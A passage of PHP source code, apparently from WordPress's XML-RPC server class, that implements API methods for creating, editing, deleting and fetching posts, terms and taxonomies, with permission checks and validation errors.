* Helper method for wp_newPost() and wp_editPost(), containing shared logic.
*
* @since 3.4.0
*
* @see wp_insert_post()
*
* @param WP_User $user The post author if post_author isn't set in $content_struct.
* @param array|IXR_Error $content_struct Post data to insert.
* @return IXR_Error|string
*/
protected function _insert_post( $user, $content_struct ) {
$defaults = array(
'post_status' => 'draft',
'post_type' => 'post',
'post_author' => 0,
'post_password' => '',
'post_excerpt' => '',
'post_content' => '',
'post_title' => '',
'post_date' => '',
'post_date_gmt' => '',
'post_format' => null,
'post_name' => null,
'post_thumbnail' => null,
'post_parent' => 0,
'ping_status' => '',
'comment_status' => '',
'custom_fields' => null,
'terms_names' => null,
'terms' => null,
'sticky' => null,
'enclosure' => null,
'ID' => null,
);
$post_data = wp_parse_args( array_intersect_key( $content_struct, $defaults ), $defaults );
$post_type = get_post_type_object( $post_data['post_type'] );
if ( ! $post_type ) {
return new IXR_Error( 403, __( 'Invalid post type.' ) );
}
$update = ! empty( $post_data['ID'] );
if ( $update ) {
if ( ! get_post( $post_data['ID'] ) ) {
return new IXR_Error( 401, __( 'Invalid post ID.' ) );
}
if ( ! current_user_can( 'edit_post', $post_data['ID'] ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to edit this post.' ) );
}
if ( get_post_type( $post_data['ID'] ) !== $post_data['post_type'] ) {
return new IXR_Error( 401, __( 'The post type may not be changed.' ) );
}
} else {
if ( ! current_user_can( $post_type->cap->create_posts ) || ! current_user_can( $post_type->cap->edit_posts ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to post on this site.' ) );
}
}
switch ( $post_data['post_status'] ) {
case 'draft':
case 'pending':
break;
case 'private':
if ( ! current_user_can( $post_type->cap->publish_posts ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to create private posts in this post type.' ) );
}
break;
case 'publish':
case 'future':
if ( ! current_user_can( $post_type->cap->publish_posts ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to publish posts in this post type.' ) );
}
break;
default:
if ( ! get_post_status_object( $post_data['post_status'] ) ) {
$post_data['post_status'] = 'draft';
}
break;
}
if ( ! empty( $post_data['post_password'] ) && ! current_user_can( $post_type->cap->publish_posts ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to create password protected posts in this post type.' ) );
}
$post_data['post_author'] = absint( $post_data['post_author'] );
if ( ! empty( $post_data['post_author'] ) && $post_data['post_author'] !== $user->ID ) {
if ( ! current_user_can( $post_type->cap->edit_others_posts ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to create posts as this user.' ) );
}
$author = get_userdata( $post_data['post_author'] );
if ( ! $author ) {
return new IXR_Error( 404, __( 'Invalid author ID.' ) );
}
} else {
$post_data['post_author'] = $user->ID;
}
if ( 'open' !== $post_data['comment_status'] && 'closed' !== $post_data['comment_status'] ) {
unset( $post_data['comment_status'] );
}
if ( 'open' !== $post_data['ping_status'] && 'closed' !== $post_data['ping_status'] ) {
unset( $post_data['ping_status'] );
}
// Do some timestamp voodoo.
if ( ! empty( $post_data['post_date_gmt'] ) ) {
// We know this is supposed to be GMT, so we're going to slap that Z on there by force.
$date_created = rtrim( $post_data['post_date_gmt']->getIso(), 'Z' ) . 'Z';
} elseif ( ! empty( $post_data['post_date'] ) ) {
$date_created = $post_data['post_date']->getIso();
}
// Default to not flagging the post date to be edited unless it's intentional.
$post_data['edit_date'] = false;
if ( ! empty( $date_created ) ) {
$post_data['post_date'] = iso8601_to_datetime( $date_created );
$post_data['post_date_gmt'] = iso8601_to_datetime( $date_created, 'gmt' );
// Flag the post date to be edited.
$post_data['edit_date'] = true;
}
if ( ! isset( $post_data['ID'] ) ) {
$post_data['ID'] = get_default_post_to_edit( $post_data['post_type'], true )->ID;
}
$post_id = $post_data['ID'];
if ( 'post' === $post_data['post_type'] ) {
$error = $this->_toggle_sticky( $post_data, $update );
if ( $error ) {
return $error;
}
}
if ( isset( $post_data['post_thumbnail'] ) ) {
// Empty value deletes, non-empty value adds/updates.
if ( ! $post_data['post_thumbnail'] ) {
delete_post_thumbnail( $post_id );
} elseif ( ! get_post( absint( $post_data['post_thumbnail'] ) ) ) {
return new IXR_Error( 404, __( 'Invalid attachment ID.' ) );
}
set_post_thumbnail( $post_id, $post_data['post_thumbnail'] );
unset( $content_struct['post_thumbnail'] );
}
if ( isset( $post_data['custom_fields'] ) ) {
$this->set_custom_fields( $post_id, $post_data['custom_fields'] );
}
if ( isset( $post_data['terms'] ) || isset( $post_data['terms_names'] ) ) {
$post_type_taxonomies = get_object_taxonomies( $post_data['post_type'], 'objects' );
// Accumulate term IDs from terms and terms_names.
$terms = array();
// First validate the terms specified by ID.
if ( isset( $post_data['terms'] ) && is_array( $post_data['terms'] ) ) {
$taxonomies = array_keys( $post_data['terms'] );
// Validating term IDs.
foreach ( $taxonomies as $taxonomy ) {
if ( ! array_key_exists( $taxonomy, $post_type_taxonomies ) ) {
return new IXR_Error( 401, __( 'Sorry, one of the given taxonomies is not supported by the post type.' ) );
}
if ( ! current_user_can( $post_type_taxonomies[ $taxonomy ]->cap->assign_terms ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to assign a term to one of the given taxonomies.' ) );
}
$term_ids = $post_data['terms'][ $taxonomy ];
$terms[ $taxonomy ] = array();
foreach ( $term_ids as $term_id ) {
$term = get_term_by( 'id', $term_id, $taxonomy );
if ( ! $term ) {
return new IXR_Error( 403, __( 'Invalid term ID.' ) );
}
$terms[ $taxonomy ][] = (int) $term_id;
}
}
}
// Now validate terms specified by name.
if ( isset( $post_data['terms_names'] ) && is_array( $post_data['terms_names'] ) ) {
$taxonomies = array_keys( $post_data['terms_names'] );
foreach ( $taxonomies as $taxonomy ) {
if ( ! array_key_exists( $taxonomy, $post_type_taxonomies ) ) {
return new IXR_Error( 401, __( 'Sorry, one of the given taxonomies is not supported by the post type.' ) );
}
if ( ! current_user_can( $post_type_taxonomies[ $taxonomy ]->cap->assign_terms ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to assign a term to one of the given taxonomies.' ) );
}
/*
* For hierarchical taxonomies, we can't assign a term when multiple terms
* in the hierarchy share the same name.
*/
$ambiguous_terms = array();
if ( is_taxonomy_hierarchical( $taxonomy ) ) {
$tax_term_names = get_terms(
array(
'taxonomy' => $taxonomy,
'fields' => 'names',
'hide_empty' => false,
)
);
// Count the number of terms with the same name.
$tax_term_names_count = array_count_values( $tax_term_names );
// Filter out non-ambiguous term names.
$ambiguous_tax_term_counts = array_filter( $tax_term_names_count, array( $this, '_is_greater_than_one' ) );
$ambiguous_terms = array_keys( $ambiguous_tax_term_counts );
}
$term_names = $post_data['terms_names'][ $taxonomy ];
foreach ( $term_names as $term_name ) {
if ( in_array( $term_name, $ambiguous_terms, true ) ) {
return new IXR_Error( 401, __( 'Ambiguous term name used in a hierarchical taxonomy. Please use term ID instead.' ) );
}
$term = get_term_by( 'name', $term_name, $taxonomy );
if ( ! $term ) {
// Term doesn't exist, so check that the user is allowed to create new terms.
if ( ! current_user_can( $post_type_taxonomies[ $taxonomy ]->cap->edit_terms ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to add a term to one of the given taxonomies.' ) );
}
// Create the new term.
$term_info = wp_insert_term( $term_name, $taxonomy );
if ( is_wp_error( $term_info ) ) {
return new IXR_Error( 500, $term_info->get_error_message() );
}
$terms[ $taxonomy ][] = (int) $term_info['term_id'];
} else {
$terms[ $taxonomy ][] = (int) $term->term_id;
}
}
}
}
$post_data['tax_input'] = $terms;
unset( $post_data['terms'], $post_data['terms_names'] );
}
if ( isset( $post_data['post_format'] ) ) {
$format = set_post_format( $post_id, $post_data['post_format'] );
if ( is_wp_error( $format ) ) {
return new IXR_Error( 500, $format->get_error_message() );
}
unset( $post_data['post_format'] );
}
// Handle enclosures.
$enclosure = isset( $post_data['enclosure'] ) ? $post_data['enclosure'] : null;
$this->add_enclosure_if_new( $post_id, $enclosure );
$this->attach_uploads( $post_id, $post_data['post_content'] );
/**
* Filters post data array to be inserted via XML-RPC.
*
* @since 3.4.0
*
* @param array $post_data Parsed array of post data.
* @param array $content_struct Post data array.
*/
$post_data = apply_filters( 'xmlrpc_wp_insert_post_data', $post_data, $content_struct );
// Remove all null values to allow for using the insert/update post default values for those keys instead.
$post_data = array_filter(
$post_data,
static function ( $value ) {
return null !== $value;
}
);
$post_id = $update ? wp_update_post( $post_data, true ) : wp_insert_post( $post_data, true );
if ( is_wp_error( $post_id ) ) {
return new IXR_Error( 500, $post_id->get_error_message() );
}
if ( ! $post_id ) {
if ( $update ) {
return new IXR_Error( 401, __( 'Sorry, the post could not be updated.' ) );
} else {
return new IXR_Error( 401, __( 'Sorry, the post could not be created.' ) );
}
}
return (string) $post_id;
}
/**
* Edits a post for any registered post type.
*
* The $content_struct parameter only needs to contain fields that
* should be changed. All other fields will retain their existing values.
*
* @since 3.4.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type int $3 Post ID.
* @type array $4 Extra content arguments.
* }
* @return true|IXR_Error True on success, IXR_Error on failure.
*/
public function wp_editPost( $args ) {
if ( ! $this->minimum_args( $args, 5 ) ) {
return $this->error;
}
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$post_id = (int) $args[3];
$content_struct = $args[4];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.editPost', $args, $this );
$post = get_post( $post_id, ARRAY_A );
if ( empty( $post['ID'] ) ) {
return new IXR_Error( 404, __( 'Invalid post ID.' ) );
}
if ( isset( $content_struct['if_not_modified_since'] ) ) {
// If the post has been modified since the date provided, return an error.
if ( mysql2date( 'U', $post['post_modified_gmt'] ) > $content_struct['if_not_modified_since']->getTimestamp() ) {
return new IXR_Error( 409, __( 'There is a revision of this post that is more recent.' ) );
}
}
// Convert the date field back to IXR form.
$post['post_date'] = $this->_convert_date( $post['post_date'] );
/*
* Ignore the existing GMT date if it is empty or a non-GMT date was supplied in $content_struct,
* since _insert_post() will ignore the non-GMT date if the GMT date is set.
*/
if ( '0000-00-00 00:00:00' === $post['post_date_gmt'] || isset( $content_struct['post_date'] ) ) {
unset( $post['post_date_gmt'] );
} else {
$post['post_date_gmt'] = $this->_convert_date( $post['post_date_gmt'] );
}
/*
* If the API client did not provide 'post_date', then we must not perpetuate the value that
* was stored in the database, or it will appear to be an intentional edit. Conveying it here
* as if it was coming from the API client will cause an otherwise zeroed out 'post_date_gmt'
* to get set with the value that was originally stored in the database when the draft was created.
*/
if ( ! isset( $content_struct['post_date'] ) ) {
unset( $post['post_date'] );
}
$this->escape( $post );
$merged_content_struct = array_merge( $post, $content_struct );
$retval = $this->_insert_post( $user, $merged_content_struct );
if ( $retval instanceof IXR_Error ) {
return $retval;
}
return true;
}
/**
* Deletes a post for any registered post type.
*
* @since 3.4.0
*
* @see wp_delete_post()
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type int $3 Post ID.
* }
* @return true|IXR_Error True on success, IXR_Error instance on failure.
*/
public function wp_deletePost( $args ) {
if ( ! $this->minimum_args( $args, 4 ) ) {
return $this->error;
}
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$post_id = (int) $args[3];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.deletePost', $args, $this );
$post = get_post( $post_id, ARRAY_A );
if ( empty( $post['ID'] ) ) {
return new IXR_Error( 404, __( 'Invalid post ID.' ) );
}
if ( ! current_user_can( 'delete_post', $post_id ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to delete this post.' ) );
}
$result = wp_delete_post( $post_id );
if ( ! $result ) {
return new IXR_Error( 500, __( 'Sorry, the post could not be deleted.' ) );
}
return true;
}
/**
* Retrieves a post.
*
* @since 3.4.0
*
* The optional $fields parameter specifies what fields will be included
* in the response array. This should be a list of field names. 'post_id' will
* always be included in the response regardless of the value of $fields.
*
* Instead of, or in addition to, individual field names, conceptual group
* names can be used to specify multiple fields. The available conceptual
* groups are 'post' (all basic fields), 'taxonomies', 'custom_fields',
* and 'enclosure'.
*
* @see get_post()
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type int $3 Post ID.
* @type array $4 Optional. The subset of post type fields to return.
* }
* @return array|IXR_Error Array contains (based on $fields parameter):
* - 'post_id'
* - 'post_title'
* - 'post_date'
* - 'post_date_gmt'
* - 'post_modified'
* - 'post_modified_gmt'
* - 'post_status'
* - 'post_type'
* - 'post_name'
* - 'post_author'
* - 'post_password'
* - 'post_excerpt'
* - 'post_content'
* - 'link'
* - 'comment_status'
* - 'ping_status'
* - 'sticky'
* - 'custom_fields'
* - 'terms'
* - 'categories'
* - 'tags'
* - 'enclosure'
*/
public function wp_getPost( $args ) {
if ( ! $this->minimum_args( $args, 4 ) ) {
return $this->error;
}
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$post_id = (int) $args[3];
if ( isset( $args[4] ) ) {
$fields = $args[4];
} else {
/**
* Filters the default post query fields used by the given XML-RPC method.
*
* @since 3.4.0
*
* @param array $fields An array of post fields to retrieve. By default,
* contains 'post', 'terms', and 'custom_fields'.
* @param string $method Method name.
*/
$fields = apply_filters( 'xmlrpc_default_post_fields', array( 'post', 'terms', 'custom_fields' ), 'wp.getPost' );
}
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.getPost', $args, $this );
$post = get_post( $post_id, ARRAY_A );
if ( empty( $post['ID'] ) ) {
return new IXR_Error( 404, __( 'Invalid post ID.' ) );
}
if ( ! current_user_can( 'edit_post', $post_id ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to edit this post.' ) );
}
return $this->_prepare_post( $post, $fields );
}
/**
* Retrieves posts.
*
* @since 3.4.0
*
* @see wp_get_recent_posts()
* @see wp_getPost() for more on `$fields`
* @see get_posts() for more on `$filter` values
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type array $3 Optional. Modifies the query used to retrieve posts. Accepts 'post_type',
* 'post_status', 'number', 'offset', 'orderby', 's', and 'order'.
* Default empty array.
* @type array $4 Optional. The subset of post type fields to return in the response array.
* }
* @return array|IXR_Error Array containing a collection of posts.
*/
public function wp_getPosts( $args ) {
if ( ! $this->minimum_args( $args, 3 ) ) {
return $this->error;
}
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$filter = isset( $args[3] ) ? $args[3] : array();
if ( isset( $args[4] ) ) {
$fields = $args[4];
} else {
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
$fields = apply_filters( 'xmlrpc_default_post_fields', array( 'post', 'terms', 'custom_fields' ), 'wp.getPosts' );
}
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.getPosts', $args, $this );
$query = array();
if ( isset( $filter['post_type'] ) ) {
$post_type = get_post_type_object( $filter['post_type'] );
if ( ! ( (bool) $post_type ) ) {
return new IXR_Error( 403, __( 'Invalid post type.' ) );
}
} else {
$post_type = get_post_type_object( 'post' );
}
if ( ! current_user_can( $post_type->cap->edit_posts ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to edit posts in this post type.' ) );
}
$query['post_type'] = $post_type->name;
if ( isset( $filter['post_status'] ) ) {
$query['post_status'] = $filter['post_status'];
}
if ( isset( $filter['number'] ) ) {
$query['numberposts'] = absint( $filter['number'] );
}
if ( isset( $filter['offset'] ) ) {
$query['offset'] = absint( $filter['offset'] );
}
if ( isset( $filter['orderby'] ) ) {
$query['orderby'] = $filter['orderby'];
if ( isset( $filter['order'] ) ) {
$query['order'] = $filter['order'];
}
}
if ( isset( $filter['s'] ) ) {
$query['s'] = $filter['s'];
}
$posts_list = wp_get_recent_posts( $query );
if ( ! $posts_list ) {
return array();
}
// Holds all the posts data.
$struct = array();
foreach ( $posts_list as $post ) {
if ( ! current_user_can( 'edit_post', $post['ID'] ) ) {
continue;
}
$struct[] = $this->_prepare_post( $post, $fields );
}
return $struct;
}
/**
* Creates a new term.
*
* @since 3.4.0
*
* @see wp_insert_term()
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type array $3 Content struct for adding a new term. The struct must contain
* the term 'name' and 'taxonomy'. Optional accepted values include
* 'parent', 'description', and 'slug'.
* }
* @return int|IXR_Error The term ID on success, or an IXR_Error object on failure.
*/
public function wp_newTerm( $args ) {
if ( ! $this->minimum_args( $args, 4 ) ) {
return $this->error;
}
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$content_struct = $args[3];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.newTerm', $args, $this );
if ( ! taxonomy_exists( $content_struct['taxonomy'] ) ) {
return new IXR_Error( 403, __( 'Invalid taxonomy.' ) );
}
$taxonomy = get_taxonomy( $content_struct['taxonomy'] );
if ( ! current_user_can( $taxonomy->cap->edit_terms ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to create terms in this taxonomy.' ) );
}
$taxonomy = (array) $taxonomy;
// Hold the data of the term.
$term_data = array();
$term_data['name'] = trim( $content_struct['name'] );
if ( empty( $term_data['name'] ) ) {
return new IXR_Error( 403, __( 'The term name cannot be empty.' ) );
}
if ( isset( $content_struct['parent'] ) ) {
if ( ! $taxonomy['hierarchical'] ) {
return new IXR_Error( 403, __( 'This taxonomy is not hierarchical.' ) );
}
$parent_term_id = (int) $content_struct['parent'];
$parent_term = get_term( $parent_term_id, $taxonomy['name'] );
if ( is_wp_error( $parent_term ) ) {
return new IXR_Error( 500, $parent_term->get_error_message() );
}
if ( ! $parent_term ) {
return new IXR_Error( 403, __( 'Parent term does not exist.' ) );
}
$term_data['parent'] = $content_struct['parent'];
}
if ( isset( $content_struct['description'] ) ) {
$term_data['description'] = $content_struct['description'];
}
if ( isset( $content_struct['slug'] ) ) {
$term_data['slug'] = $content_struct['slug'];
}
$term = wp_insert_term( $term_data['name'], $taxonomy['name'], $term_data );
if ( is_wp_error( $term ) ) {
return new IXR_Error( 500, $term->get_error_message() );
}
if ( ! $term ) {
return new IXR_Error( 500, __( 'Sorry, the term could not be created.' ) );
}
// Add term meta.
if ( isset( $content_struct['custom_fields'] ) ) {
$this->set_term_custom_fields( $term['term_id'], $content_struct['custom_fields'] );
}
return (string) $term['term_id'];
}
/**
* Edits a term.
*
* @since 3.4.0
*
* @see wp_update_term()
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type int $3 Term ID.
* @type array $4 Content struct for editing a term. The struct must contain the
* term 'taxonomy'. Optional accepted values include 'name', 'parent',
* 'description', and 'slug'.
* }
* @return true|IXR_Error True on success, IXR_Error instance on failure.
*/
public function wp_editTerm( $args ) {
if ( ! $this->minimum_args( $args, 5 ) ) {
return $this->error;
}
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$term_id = (int) $args[3];
$content_struct = $args[4];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.editTerm', $args, $this );
if ( ! taxonomy_exists( $content_struct['taxonomy'] ) ) {
return new IXR_Error( 403, __( 'Invalid taxonomy.' ) );
}
$taxonomy = get_taxonomy( $content_struct['taxonomy'] );
$taxonomy = (array) $taxonomy;
// Hold the data of the term.
$term_data = array();
$term = get_term( $term_id, $content_struct['taxonomy'] );
if ( is_wp_error( $term ) ) {
return new IXR_Error( 500, $term->get_error_message() );
}
if ( ! $term ) {
return new IXR_Error( 404, __( 'Invalid term ID.' ) );
}
if ( ! current_user_can( 'edit_term', $term_id ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to edit this term.' ) );
}
if ( isset( $content_struct['name'] ) ) {
$term_data['name'] = trim( $content_struct['name'] );
if ( empty( $term_data['name'] ) ) {
return new IXR_Error( 403, __( 'The term name cannot be empty.' ) );
}
}
if ( ! empty( $content_struct['parent'] ) ) {
if ( ! $taxonomy['hierarchical'] ) {
return new IXR_Error( 403, __( 'Cannot set parent term, taxonomy is not hierarchical.' ) );
}
$parent_term_id = (int) $content_struct['parent'];
$parent_term = get_term( $parent_term_id, $taxonomy['name'] );
if ( is_wp_error( $parent_term ) ) {
return new IXR_Error( 500, $parent_term->get_error_message() );
}
if ( ! $parent_term ) {
return new IXR_Error( 403, __( 'Parent term does not exist.' ) );
}
$term_data['parent'] = $content_struct['parent'];
}
if ( isset( $content_struct['description'] ) ) {
$term_data['description'] = $content_struct['description'];
}
if ( isset( $content_struct['slug'] ) ) {
$term_data['slug'] = $content_struct['slug'];
}
$term = wp_update_term( $term_id, $taxonomy['name'], $term_data );
if ( is_wp_error( $term ) ) {
return new IXR_Error( 500, $term->get_error_message() );
}
if ( ! $term ) {
return new IXR_Error( 500, __( 'Sorry, editing the term failed.' ) );
}
// Update term meta.
if ( isset( $content_struct['custom_fields'] ) ) {
$this->set_term_custom_fields( $term_id, $content_struct['custom_fields'] );
}
return true;
}
/**
* Deletes a term.
*
* @since 3.4.0
*
* @see wp_delete_term()
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type string $3 Taxonomy name.
* @type int $4 Term ID.
* }
* @return true|IXR_Error True on success, IXR_Error instance on failure.
*/
public function wp_deleteTerm( $args ) {
if ( ! $this->minimum_args( $args, 5 ) ) {
return $this->error;
}
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$taxonomy = $args[3];
$term_id = (int) $args[4];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.deleteTerm', $args, $this );
if ( ! taxonomy_exists( $taxonomy ) ) {
return new IXR_Error( 403, __( 'Invalid taxonomy.' ) );
}
$taxonomy = get_taxonomy( $taxonomy );
$term = get_term( $term_id, $taxonomy->name );
if ( is_wp_error( $term ) ) {
return new IXR_Error( 500, $term->get_error_message() );
}
if ( ! $term ) {
return new IXR_Error( 404, __( 'Invalid term ID.' ) );
}
if ( ! current_user_can( 'delete_term', $term_id ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to delete this term.' ) );
}
$result = wp_delete_term( $term_id, $taxonomy->name );
if ( is_wp_error( $result ) ) {
return new IXR_Error( 500, $result->get_error_message() );
}
if ( ! $result ) {
return new IXR_Error( 500, __( 'Sorry, deleting the term failed.' ) );
}
return $result;
}
/**
* Retrieves a term.
*
* @since 3.4.0
*
* @see get_term()
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type string $3 Taxonomy name.
* @type int $4 Term ID.
* }
* @return array|IXR_Error IXR_Error on failure, array on success, containing:
* - 'term_id'
* - 'name'
* - 'slug'
* - 'term_group'
* - 'term_taxonomy_id'
* - 'taxonomy'
* - 'description'
* - 'parent'
* - 'count'
*/
public function wp_getTerm( $args ) {
if ( ! $this->minimum_args( $args, 5 ) ) {
return $this->error;
}
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$taxonomy = $args[3];
$term_id = (int) $args[4];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.getTerm', $args, $this );
if ( ! taxonomy_exists( $taxonomy ) ) {
return new IXR_Error( 403, __( 'Invalid taxonomy.' ) );
}
$taxonomy = get_taxonomy( $taxonomy );
$term = get_term( $term_id, $taxonomy->name, ARRAY_A );
if ( is_wp_error( $term ) ) {
return new IXR_Error( 500, $term->get_error_message() );
}
if ( ! $term ) {
return new IXR_Error( 404, __( 'Invalid term ID.' ) );
}
if ( ! current_user_can( 'assign_term', $term_id ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to assign this term.' ) );
}
return $this->_prepare_term( $term );
}
/**
* Retrieves all terms for a taxonomy.
*
* @since 3.4.0
*
* The optional $filter parameter modifies the query used to retrieve terms.
* Accepted keys are 'number', 'offset', 'orderby', 'order', 'hide_empty', and 'search'.
*
* @see get_terms()
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type string $3 Taxonomy name.
* @type array $4 Optional. Modifies the query used to retrieve posts. Accepts 'number',
* 'offset', 'orderby', 'order', 'hide_empty', and 'search'. Default empty array.
* }
* @return array|IXR_Error An associative array of terms data on success, IXR_Error instance otherwise.
*/
public function wp_getTerms( $args ) {
if ( ! $this->minimum_args( $args, 4 ) ) {
return $this->error;
}
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$taxonomy = $args[3];
$filter = isset( $args[4] ) ? $args[4] : array();
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.getTerms', $args, $this );
if ( ! taxonomy_exists( $taxonomy ) ) {
return new IXR_Error( 403, __( 'Invalid taxonomy.' ) );
}
$taxonomy = get_taxonomy( $taxonomy );
if ( ! current_user_can( $taxonomy->cap->assign_terms ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to assign terms in this taxonomy.' ) );
}
$query = array( 'taxonomy' => $taxonomy->name );
if ( isset( $filter['number'] ) ) {
$query['number'] = absint( $filter['number'] );
}
if ( isset( $filter['offset'] ) ) {
$query['offset'] = absint( $filter['offset'] );
}
if ( isset( $filter['orderby'] ) ) {
$query['orderby'] = $filter['orderby'];
if ( isset( $filter['order'] ) ) {
$query['order'] = $filter['order'];
}
}
if ( isset( $filter['hide_empty'] ) ) {
$query['hide_empty'] = $filter['hide_empty'];
} else {
$query['get'] = 'all';
}
if ( isset( $filter['search'] ) ) {
$query['search'] = $filter['search'];
}
$terms = get_terms( $query );
if ( is_wp_error( $terms ) ) {
return new IXR_Error( 500, $terms->get_error_message() );
}
$struct = array();
foreach ( $terms as $term ) {
$struct[] = $this->_prepare_term( $term );
}
return $struct;
}
/**
* Retrieves a taxonomy.
*
* @since 3.4.0
*
* @see get_taxonomy()
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type string $3 Taxonomy name.
* @type array $4 Optional. Array of taxonomy fields to limit to in the return.
* Accepts 'labels', 'cap', 'menu', and 'object_type'.
* Default empty array.
* }
* @return array|IXR_Error An array of taxonomy data on success, IXR_Error instance otherwise.
*/
public function wp_getTaxonomy( $args ) {
if ( ! $this->minimum_args( $args, 4 ) ) {
return $this->error;
}
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$taxonomy = $args[3];
if ( isset( $args[4] ) ) {
$fields = $args[4];
} else {
/**
* Filters the default taxonomy query fields used by the given XML-RPC method.
*
* @since 3.4.0
*
* @param array $fields An array of taxonomy fields to retrieve. By default,
* contains 'labels', 'cap', and 'object_type'.
* @param string $method The method name.
*/
$fields = apply_filters( 'xmlrpc_default_taxonomy_fields', array( 'labels', 'cap', 'object_type' ), 'wp.getTaxonomy' );
}
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.getTaxonomy', $args, $this );
if ( ! taxonomy_exists( $taxonomy ) ) {
return new IXR_Error( 403, __( 'Invalid taxonomy.' ) );
}
$taxonomy = get_taxonomy( $taxonomy );
if ( ! current_user_can( $taxonomy->cap->assign_terms ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to assign terms in this taxonomy.' ) );
}
return $this->_prepare_taxonomy( $taxonomy, $fields );
}
/**
* Retrieves all taxonomies.
*
* @since 3.4.0
*
* @see get_taxonomies()
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type array $3 Optional. An array of arguments for retrieving taxonomies.
* @type array $4 Optional. The subset of taxonomy fields to return.
* }
* @return array|IXR_Error An associative array of taxonomy data with returned fields determined
* by `$fields`, or an IXR_Error instance on failure.
*/
public function wp_getTaxonomies( $args ) {
if ( ! $this->minimum_args( $args, 3 ) ) {
return $this->error;
}
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$filter = isset( $args[3] ) ? $args[3] : array( 'public' => true );
if ( isset( $args[4] ) ) {
$fields = $args[4];
} else {
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
$fields = apply_filters( 'xmlrpc_default_taxonomy_fields', array( 'labels', 'cap', 'object_type' ), 'wp.getTaxonomies' );
}
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.getTaxonomies', $args, $this );
